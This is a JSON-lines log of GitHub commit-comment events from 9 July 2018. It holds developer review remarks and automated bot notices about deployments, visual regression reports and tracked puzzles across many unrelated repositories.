{"id":"7938304957","type":"CommitCommentEvent","actor":{"login":"MrScopes"},"repo":{"name":"Minehut/skquery"},"payload":{"comment":{"id":29643410,"position":null,"line":null,"path":null,"commit_id":"1e81eecc1cf63cd3715443859a77150f1dbe88a6","created_at":"2018-07-09T15:16:19Z","updated_at":"2018-07-09T15:16:19Z","author_association":"NONE","body":"Hurry and fix please."}},"created_at":"2018-07-09T15:16:19Z"}
{"id":"7938305759","type":"CommitCommentEvent","actor":{"login":"snake575"},"repo":{"name":"delta575/trading-api-wrappers"},"payload":{"comment":{"id":29643412,"position":null,"line":null,"path":null,"commit_id":"182d1f9a680985c0920db8a2b6042945fa4fe674","created_at":"2018-07-09T15:16:26Z","updated_at":"2018-07-09T15:16:26Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bitstamp no falla cuando hay errores, devuelve json con un mensaje de error](https://trello.com/c/HQkmaRZi/156-bitstamp-no-falla-cuando-hay-errores-devuelve-json-con-un-mensaje-de-error)"}},"created_at":"2018-07-09T15:16:26Z"}
{"id":"7938307793","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29643415,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-09T15:16:46Z","updated_at":"2018-07-09T15:16:46Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/tree/master/test"}},"created_at":"2018-07-09T15:16:46Z"}
{"id":"7938310467","type":"CommitCommentEvent","actor":{"login":"richardcornish"},"repo":{"name":"Warwick101/queen-street-surgery"},"payload":{"comment":{"id":29643423,"position":null,"line":null,"path":null,"commit_id":"9959fa49e5583c8987045610bccef43e0f69c13d","created_at":"2018-07-09T15:17:11Z","updated_at":"2018-07-09T15:17:11Z","author_association":"NONE","body":"Great job! 🎉"}},"created_at":"2018-07-09T15:17:11Z"}
{"id":"7938312828","type":"CommitCommentEvent","actor":{"login":"stevectorbot"},"repo":{"name":"stevector/nerdologues-d8"},"payload":{"comment":{"id":29643430,"position":null,"line":null,"path":null,"commit_id":"5e3356b57fea3eb0f09ce89fa2c7bfcde03a51e0","created_at":"2018-07-09T15:17:31Z","updated_at":"2018-07-09T15:17:31Z","author_association":"NONE","body":"### Visual regression report:\n\n[![Visual report](https://circleci.com/gh/stevector/nerdologues-d8/1898/artifacts/0/artifacts/backstop_data/bitmaps_test/20180709-151636/failed_diff_0600294051_podcasts_0_document_0_desktop.png)](https://circleci.com/gh/stevector/nerdologues-d8/1898/artifacts/0/artifacts/backstop_data/html_report/index.html)"}},"created_at":"2018-07-09T15:17:31Z"}
{"id":"7938312838","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643431,"position":null,"line":null,"path":null,"commit_id":"82d0ad2fb9dfb88c51e143777dfbc0a8f2ebd720","created_at":"2018-07-09T15:17:31Z","updated_at":"2018-07-09T15:17:31Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/372379cf-cc92-4e92-89f3-74bcda35d2e8?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180625083019212\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d721e668-5543-4930-8048-474b678bb5e8?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180625083019212\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-151730 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-151730\") to [test](https://console.bluemix.net/apps/ff5b09d1-5b9f-45e9-9b82-57817958b3d0?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:test\"), including this commit"}},"created_at":"2018-07-09T15:17:31Z"}
{"id":"7938314410","type":"CommitCommentEvent","actor":{"login":"nmathewson"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29643437,"position":null,"line":null,"path":null,"commit_id":"fecb8214d5e95ad605e8b0d431bc332e07f2ad3f","created_at":"2018-07-09T15:17:46Z","updated_at":"2018-07-09T15:17:46Z","author_association":"CONTRIBUTOR","body":"Oops. fixed in eb856a3e51e14690ede533dd84bef48ae818eefe"}},"created_at":"2018-07-09T15:17:46Z"}
{"id":"7938315318","type":"CommitCommentEvent","actor":{"login":"brendndavis"},"repo":{"name":"doccray/dash-table-experiments"},"payload":{"comment":{"id":29643440,"position":null,"line":null,"path":null,"commit_id":"8e2bba57b17074f4ee08d1e27b30b798d9b72ca8","created_at":"2018-07-09T15:17:54Z","updated_at":"2018-07-09T15:17:54Z","author_association":"NONE","body":"Hi - I tried using this - thought it just needed an overwrite of DataTable.react.js - but I get an error for unknown row_single_select argument - is there something else I need to do?"}},"created_at":"2018-07-09T15:17:54Z"}
{"id":"7938315326","type":"CommitCommentEvent","actor":{"login":"Dridus"},"repo":{"name":"sboosali/reflex-native"},"payload":{"comment":{"id":29643441,"position":null,"line":null,"path":null,"commit_id":"80ac7893645f3559c9a0d747f326b465d7323fec","created_at":"2018-07-09T15:17:54Z","updated_at":"2018-07-09T15:17:54Z","author_association":"NONE","body":"I'd be happy to upstream this if you can explain what it's there for!"}},"created_at":"2018-07-09T15:17:54Z"}
{"id":"7938315713","type":"CommitCommentEvent","actor":{"login":"sikang"},"repo":{"name":"sikang/motion_primitive_library"},"payload":{"comment":{"id":29643443,"position":null,"line":null,"path":null,"commit_id":"63ed42bebc53bbafcdc688e58b9767a9b404169b","created_at":"2018-07-09T15:17:58Z","updated_at":"2018-07-09T15:17:58Z","author_association":"OWNER","body":"what is this new feature..."}},"created_at":"2018-07-09T15:17:58Z"}
{"id":"7938316953","type":"CommitCommentEvent","actor":{"login":"Spirtix"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643445,"position":null,"line":null,"path":null,"commit_id":"c09eda73352858dca2d679e6e7a262ac4c208b35","created_at":"2018-07-09T15:18:10Z","updated_at":"2018-07-09T15:18:10Z","author_association":"OWNER","body":"We build power on line 152 already"}},"created_at":"2018-07-09T15:18:10Z"}
{"id":"7938317625","type":"CommitCommentEvent","actor":{"login":"3w-scott"},"repo":{"name":"3w-scott/OurRecord"},"payload":{"comment":{"id":29643449,"position":null,"line":null,"path":null,"commit_id":"747d684d584d260f54937d2bf582ad51421169c3","created_at":"2018-07-09T15:18:16Z","updated_at":"2018-07-09T15:18:16Z","author_association":"OWNER","body":"HW-PLAN"}},"created_at":"2018-07-09T15:18:16Z"}
{"id":"7938319128","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29643455,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-09T15:18:29Z","updated_at":"2018-07-09T15:18:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T15:18:29Z"}
{"id":"7938323227","type":"CommitCommentEvent","actor":{"login":"bread-kun"},"repo":{"name":"bread-kun/personal_py_pro"},"payload":{"comment":{"id":29643466,"position":null,"line":null,"path":null,"commit_id":"0e548ca70293f03b9b44957846356921344ca5af","created_at":"2018-07-09T15:19:08Z","updated_at":"2018-07-09T15:19:08Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T15:19:08Z"}
{"id":"7938326191","type":"CommitCommentEvent","actor":{"login":"Spirtix"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643478,"position":null,"line":null,"path":null,"commit_id":"80b66566f802ff6ab31b511e5f5adda04524edf4","created_at":"2018-07-09T15:19:34Z","updated_at":"2018-07-09T15:19:34Z","author_association":"OWNER","body":"Check frequencies for Honor 7..."}},"created_at":"2018-07-09T15:19:34Z"}
{"id":"7938333282","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643496,"position":null,"line":null,"path":null,"commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:20:42Z","updated_at":"2018-07-09T15:20:42Z","author_association":"NONE","body":"This is in response to \"texture mode fixes (issue xqemu/xqemu#73)\" from [the todo list](https://github.com/mborgerson/xqemu/wiki/todo):\r\n\r\nIf we just skip these sort of checks I won't be working on the GPU. It's already hard enough to debug issues right now - if we have so many sources of undefined behaviour, it becomes an unmaintainable mess.\r\n\r\nEach of these 3 lines being `/* Unimplemented */` represents a larger feature of the GPU which can be used in various situations (meaning it will be hard to find the source of graphical problems).\r\nEach of these modes should take about a week to test and implement for unsigned types. **If any of them uses a signed type we'll probably have to refactor our entire pixel shader generator as our data types (and possibly even texture samplers) can't handle it.**\r\n\r\nThis *also* affects the lazy surfaces to some degree as we might need integer texture samplers which could be converted differently to standard float texture samplers.\r\n\r\nI'd suggest to prioritize other stuff first (probably network and DSP as we don't know which other games might run into these issues, whereas we have a good idea about the GPU use).\r\n\r\nWhen the rest works we can focus on these *major* GPU issues (which we can't just ignore without causing a giant mess)."}},"created_at":"2018-07-09T15:20:42Z"}
{"id":"7938334010","type":"CommitCommentEvent","actor":{"login":"fairbird"},"repo":{"name":"oscam-emu/oscam-emu"},"payload":{"comment":{"id":29643501,"position":null,"line":null,"path":null,"commit_id":"c90f68685b521ddeb84bce35f84d255840c1e48c","created_at":"2018-07-09T15:20:48Z","updated_at":"2018-07-09T15:20:48Z","author_association":"NONE","body":"Thank you ..\r\nwarning fixed with this commit..\r\nhttps://github.com/oscam-emu/oscam-patched/commit/babcca647d1452d4b1ae49ecf0620ff57cd0a317"}},"created_at":"2018-07-09T15:20:48Z"}
{"id":"7938336113","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29643505,"position":null,"line":null,"path":null,"commit_id":"9f714dd33a5c6ca90d353d45a65cb0476d91438f","created_at":"2018-07-09T15:21:09Z","updated_at":"2018-07-09T15:21:09Z","author_association":"COLLABORATOR","body":"Puzzle `926-86594440` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/staff/elections/elect_performer.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/staff/elections/elect_performer.groovy)   and submitted as #1388. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T15:21:09Z"}
{"id":"7938339076","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643512,"position":null,"line":null,"path":null,"commit_id":"82d0ad2fb9dfb88c51e143777dfbc0a8f2ebd720","created_at":"2018-07-09T15:21:37Z","updated_at":"2018-07-09T15:21:37Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/372379cf-cc92-4e92-89f3-74bcda35d2e8?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180625083019212\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d721e668-5543-4930-8048-474b678bb5e8?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180625083019212\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-prod-20180709-152131 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-prod-20180709-152131\") to [prod](https://console.bluemix.net/apps/ea6c9bb4-c2db-4426-bbe6-69c73c5cc126?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-09T15:21:37Z"}
{"id":"7938339335","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29643514,"position":null,"line":null,"path":null,"commit_id":"9f714dd33a5c6ca90d353d45a65cb0476d91438f","created_at":"2018-07-09T15:21:40Z","updated_at":"2018-07-09T15:21:40Z","author_association":"COLLABORATOR","body":"Puzzle `926-0d29fc00` discovered in   [`src/main/java/com/zerocracy/pm/staff/votes/VsOverElected.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/staff/votes/VsOverElected.java)   and submitted as #1389. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T15:21:40Z"}
{"id":"7938344377","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643525,"position":null,"line":null,"path":null,"commit_id":"872a5177abb5618ba1499b4ffb46b30939644ecc","created_at":"2018-07-09T15:22:27Z","updated_at":"2018-07-09T15:22:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/372379cf-cc92-4e92-89f3-74bcda35d2e8?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180625083019212\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d721e668-5543-4930-8048-474b678bb5e8?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180625083019212\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-152226 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-152226\") to [test](https://console.bluemix.net/apps/685172ff-0c4c-4a05-b308-33b7d6f37383?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:test\"), including this commit"}},"created_at":"2018-07-09T15:22:27Z"}
{"id":"7938345376","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"baidu/unit-dmkit"},"payload":{"comment":{"id":29643530,"position":14,"line":46,"path":"src/app_container.cpp","commit_id":"86c0befd7e67a27824ec232c84653af401554354","created_at":"2018-07-09T15:22:37Z","updated_at":"2018-07-09T15:22:37Z","author_association":"NONE","body":"Such a destructor contains still implementation details for further software development considerations.\r\n* [Resetting attributes at the end there](https://stackoverflow.com/questions/3060006/is-it-worth-setting-pointers-to-null-in-a-destructor \"Is it worth setting pointers to NULL in a destructor?\")\r\n* [Guidelines](https://isocpp.github.io/CppCoreGuidelines/CppCoreGuidelines#r11-avoid-calling-new-and-delete-explicitly \"C++ core guideline “R.11: Avoid calling new and delete explicitly”\")"}},"created_at":"2018-07-09T15:22:37Z"}
{"id":"7938345615","type":"CommitCommentEvent","actor":{"login":"Lugghawk"},"repo":{"name":"Hoggit/HoggyBot"},"payload":{"comment":{"id":29643531,"position":17,"line":32,"path":"server_status/server_status.py","commit_id":"4bbbd1685a12840d49bdd9221331516b11a135ed","created_at":"2018-07-09T15:22:39Z","updated_at":"2018-07-09T15:22:39Z","author_association":"CONTRIBUTOR","body":"not used?"}},"created_at":"2018-07-09T15:22:39Z"}
{"id":"7938346343","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643532,"position":12,"line":50,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T15:22:45Z","updated_at":"2018-07-09T15:22:45Z","author_association":"CONTRIBUTOR","body":"I used to think VS added this functionality but I must have imagined it because it doesn't work when I try it now. Not sure about other IDE's."}},"created_at":"2018-07-09T15:22:45Z"}
{"id":"7938347301","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643539,"position":null,"line":null,"path":null,"commit_id":"71093a99e000d6301eeb32ccc6e31478f54bf17c","created_at":"2018-07-09T15:22:55Z","updated_at":"2018-07-09T15:22:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/99c9bc86-1f92-4ead-bbd7-ae3778907c81?env_id=ibm%3Ayp%3Aeu-gb \"simple-toolchain-20180709142457809\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/308f32d4-d37e-4351-8eb5-0a631c7a19d2?env_id=ibm%3Ayp%3Aeu-gb \"toolchain demo\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-dev-20180709-152254 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-dev-20180709-152254\") to [dev](https://console.bluemix.net/apps/26e841a3-5e75-4d82-b030-ba712e12dab9?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-09T15:22:55Z"}
{"id":"7938348050","type":"CommitCommentEvent","actor":{"login":"Jumblemuddle"},"repo":{"name":"awsdocs/aws-codepipeline-user-guide"},"payload":{"comment":{"id":29643540,"position":null,"line":null,"path":null,"commit_id":"d43bf53a6635f0bde7dbc648f8b3ed685302da4f","created_at":"2018-07-09T15:23:02Z","updated_at":"2018-07-09T15:23:02Z","author_association":"NONE","body":"Thanks, @darlaker, it looks like 1.15.10 was released on Apr 26, so that's why it's not working for me yet."}},"created_at":"2018-07-09T15:23:02Z"}
{"id":"7938348155","type":"CommitCommentEvent","actor":{"login":"cschroed-usgs"},"repo":{"name":"USGS-CIDA/coastal-hazards"},"payload":{"comment":{"id":29643541,"position":null,"line":null,"path":null,"commit_id":"ad64745d68fbce834fa373a8740dc4c353998953","created_at":"2018-07-09T15:23:04Z","updated_at":"2018-07-09T15:23:04Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-09T15:23:04Z"}
{"id":"7938356881","type":"CommitCommentEvent","actor":{"login":"xjavern"},"repo":{"name":"xjavern/test"},"payload":{"comment":{"id":29643564,"position":null,"line":null,"path":null,"commit_id":"96a752c1c9e5dd937f8dcebaaec73378d651f73d","created_at":"2018-07-09T15:24:27Z","updated_at":"2018-07-09T15:24:27Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-09T15:24:27Z"}
{"id":"7938359617","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29643569,"position":null,"line":null,"path":null,"commit_id":"8c7391fea945cdffadaa3ff6742bfc360be298f2","created_at":"2018-07-09T15:24:52Z","updated_at":"2018-07-09T15:24:52Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [planmigrat](https://planmigrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://planmigrat-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-09T15:24:52Z"}
{"id":"7938359644","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643570,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T15:24:53Z","updated_at":"2018-07-09T15:24:53Z","author_association":"CONTRIBUTOR","body":"I started a branch with a refactor of this entire system that internally uses no smart pointers to avoid all the atomics, but haven't gotten around to finishing it - in the end I still needed to do some reference counting and haven't figure out a way around it yet."}},"created_at":"2018-07-09T15:24:53Z"}
{"id":"7938359940","type":"CommitCommentEvent","actor":{"login":"SpeedoWBT"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643571,"position":null,"line":null,"path":null,"commit_id":"c09eda73352858dca2d679e6e7a262ac4c208b35","created_at":"2018-07-09T15:24:55Z","updated_at":"2018-07-09T15:24:55Z","author_association":"COLLABORATOR","body":"Hi , Ok maybe we could delete 150 to 152 ?"}},"created_at":"2018-07-09T15:24:55Z"}
{"id":"7938361145","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29643573,"position":null,"line":null,"path":null,"commit_id":"a5d565d94ac2d248eb7f4b9d81ca49561c2753ef","created_at":"2018-07-09T15:25:07Z","updated_at":"2018-07-09T15:25:07Z","author_association":"OWNER","body":"Looks good."}},"created_at":"2018-07-09T15:25:07Z"}
{"id":"7938361367","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29643574,"position":null,"line":null,"path":null,"commit_id":"7345dc023ce07127cf6bf3b37a03789ea4893a58","created_at":"2018-07-09T15:25:09Z","updated_at":"2018-07-09T15:25:09Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-34](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-09T15:25:09Z"}
{"id":"7938363659","type":"CommitCommentEvent","actor":{"login":"mkht"},"repo":{"name":"mkht/DSCR_Firefox"},"payload":{"comment":{"id":29643582,"position":null,"line":null,"path":null,"commit_id":"fe18fb5e15fc89fd08bcf929343f94b9e8d2e07c","created_at":"2018-07-09T15:25:29Z","updated_at":"2018-07-09T15:25:29Z","author_association":"OWNER","body":"#6"}},"created_at":"2018-07-09T15:25:29Z"}
{"id":"7938392682","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643637,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T15:30:10Z","updated_at":"2018-07-09T15:30:10Z","author_association":"CONTRIBUTOR","body":"Love this idea! When I get a moment I'll likely change all the existing `rtti*` calls to use this approach. \r\n\r\nLater on I also want to get rid of having a separate three methods (read, write, getSize) and perhaps just be able to define a single construct per field, but have no ideas on that yet."}},"created_at":"2018-07-09T15:30:10Z"}
{"id":"7938394788","type":"CommitCommentEvent","actor":{"login":"alieslam"},"repo":{"name":"concise/micro-ecc-rfc6979-sha256-p256"},"payload":{"comment":{"id":29643644,"position":null,"line":null,"path":null,"commit_id":"14f575ee9ed5376cad27d97b57a99f6d1c7703f8","created_at":"2018-07-09T15:30:28Z","updated_at":"2018-07-09T15:30:28Z","author_association":"NONE","body":"Are there any chances to merge this commit to the upstream of the original repo by [kmackay](https://github.com/kmackay/micro-ecc). Also I can see that there's another [pull request](https://github.com/concise/micro-ecc/commits/rfc6979-conformance) with similar idea of supporting strict rfc6979. Which of those repo's should I consider working with? Thanks"}},"created_at":"2018-07-09T15:30:28Z"}
{"id":"7938397019","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643648,"position":null,"line":null,"path":null,"commit_id":"093e9e94c60d9c30cb4b7af105ad5898f3ccd562","created_at":"2018-07-09T15:30:48Z","updated_at":"2018-07-09T15:30:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/372379cf-cc92-4e92-89f3-74bcda35d2e8?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180625083019212\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d721e668-5543-4930-8048-474b678bb5e8?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180625083019212\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-prod-20180709-153042 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-prod-20180709-153042\") to [prod](https://console.bluemix.net/apps/a3fc8fa0-96b8-4b1e-8c82-6597df84effd?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-09T15:30:48Z"}
{"id":"7938397829","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29643649,"position":19,"line":151,"path":"main/src/core/MonoDevelop.Projects.Formats.MSBuild/MonoDevelop.Projects.MSBuild/BuildEngine.cs","commit_id":"a901656b7598bccbf76830d511b6da39cfb1d685","created_at":"2018-07-09T15:30:55Z","updated_at":"2018-07-09T15:30:55Z","author_association":"MEMBER","body":"I think one thing we can do here to ensure it's on the STA thread is `Debug.Assert (Monitor.IsEntered (threadLock))`"}},"created_at":"2018-07-09T15:30:55Z"}
{"id":"7938399729","type":"CommitCommentEvent","actor":{"login":"SpeedoWBT"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643653,"position":null,"line":null,"path":null,"commit_id":"80b66566f802ff6ab31b511e5f5adda04524edf4","created_at":"2018-07-09T15:31:13Z","updated_at":"2018-07-09T15:31:13Z","author_association":"COLLABORATOR","body":"little core freq :   403200,    604800 ,  806400, 1017600, 1209600, 1401600, 1516800,\r\nbig core freq : 1017600, 1209600, 1401600, 1612800, 1708800, 1804800, 2016000, 2208000 \r\njust for gpu i'am not sure .."}},"created_at":"2018-07-09T15:31:13Z"}
{"id":"7938401102","type":"CommitCommentEvent","actor":{"login":"NBR-hugh"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29643658,"position":4,"line":761,"path":"ch1/1.3FormulatingAbstractionswithHigher-OrderProcedures.md","commit_id":"5e6f8dc058f2a28d685284124e590c5796239011","created_at":"2018-07-09T15:31:26Z","updated_at":"2018-07-09T15:31:26Z","author_association":"NONE","body":"编程命名学  太长太短都不好,易懂适中刚刚好."}},"created_at":"2018-07-09T15:31:26Z"}
{"id":"7938401239","type":"CommitCommentEvent","actor":{"login":"astflour"},"repo":{"name":"astflour/sample-cloud-native-toolchain-tutorial-20180625083019212"},"payload":{"comment":{"id":29643659,"position":null,"line":null,"path":null,"commit_id":"71093a99e000d6301eeb32ccc6e31478f54bf17c","created_at":"2018-07-09T15:31:27Z","updated_at":"2018-07-09T15:31:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/372379cf-cc92-4e92-89f3-74bcda35d2e8?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180625083019212\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d721e668-5543-4930-8048-474b678bb5e8?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180625083019212\") deployed [sample-cloud-native-toolchain-tutorial-20180625083019212](https://github.com/astflour/sample-cloud-native-toolchain-tutorial-20180625083019212/releases/tag/deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-153121 \"deploy-ibm-yp-eu-gb-astflour-uk.ibm.com-test-20180709-153121\") to [test](https://console.bluemix.net/apps/6ccd3455-9c7b-4f25-9462-7d58f6c3ae00?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:astflour@uk.ibm.com:test\"), including this commit"}},"created_at":"2018-07-09T15:31:27Z"}
{"id":"7938401547","type":"CommitCommentEvent","actor":{"login":"noximus"},"repo":{"name":"ceosabio/Name-that-tune"},"payload":{"comment":{"id":29643661,"position":24,"line":55,"path":"javascript/app.js","commit_id":"25c2f704bdb579fb73b9f08014677dee3d50c167","created_at":"2018-07-09T15:31:29Z","updated_at":"2018-07-09T15:31:29Z","author_association":"NONE","body":"This should only have two parameters.  it seems to have 3 or 6.  \r\n\r\ndon't try to do 6 at once before you can even get a single one working!\r\n\r\nelement.setAttribute( \"attribute\", \"what to change it too\");  it should be something simple like that.  you have 2-3 extra lines of code in here.  How would you even know which one is breaking with so much in there.  Start small.  "}},"created_at":"2018-07-09T15:31:29Z"}
{"id":"7938401843","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643663,"position":49,"line":57,"path":"Source/Foundation/bsfCore/Particles/BsParticleManager.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T15:31:33Z","updated_at":"2018-07-09T15:31:33Z","author_association":"CONTRIBUTOR","body":"I prefix with `m` when they're private, but this is a struct and all its members are public."}},"created_at":"2018-07-09T15:31:33Z"}
